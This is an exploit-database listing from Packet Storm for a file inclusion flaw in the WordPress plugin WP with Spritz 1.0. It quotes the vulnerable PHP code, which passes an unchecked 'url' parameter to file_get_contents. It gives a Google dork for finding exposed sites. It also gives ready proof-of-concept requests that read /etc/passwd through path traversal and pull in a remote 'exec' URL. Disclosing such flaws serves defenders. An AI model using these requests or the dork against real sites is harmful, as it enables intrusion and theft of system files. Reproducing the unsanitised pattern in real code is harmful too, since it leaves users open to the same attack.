WordPress WP With Spritz 1.0 File Inclusion

2018-04-26T00:00:00
ID PACKETSTORM:147376
Type packetstorm
Reporter Wadeek
Modified 2018-04-26T00:00:00

Description

                                        
                                            `# Exploit Title: WordPress Plugin WP with Spritz 1.0 - Remote File Inclusion  
# Date: 2018-04-25  
# Exploit Author: Wadeek  
# Software Link: https://downloads.wordpress.org/plugin/wp-with-spritz.zip  
# Software Version: 1.0  
# Google Dork: intitle:("Spritz Login Success") AND inurl:("wp-with-spritz/wp.spritz.login.success.html")  
# Tested on: Apache2 with PHP 7 on Linux  
# Category: webapps  
  
  
1. Version Disclosure  
  
/wp-content/plugins/wp-with-spritz/readme.txt  
  
2. Source Code  
  
if(isset($_GET['url'])){  
$content=file_get_contents($_GET['url']);  
  
3. Proof of Concept  
  
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=/../../../..//etc/passwd  
/wp-content/plugins/wp-with-spritz/wp.spritz.content.filter.php?url=http(s)://domain/exec  
  
  
`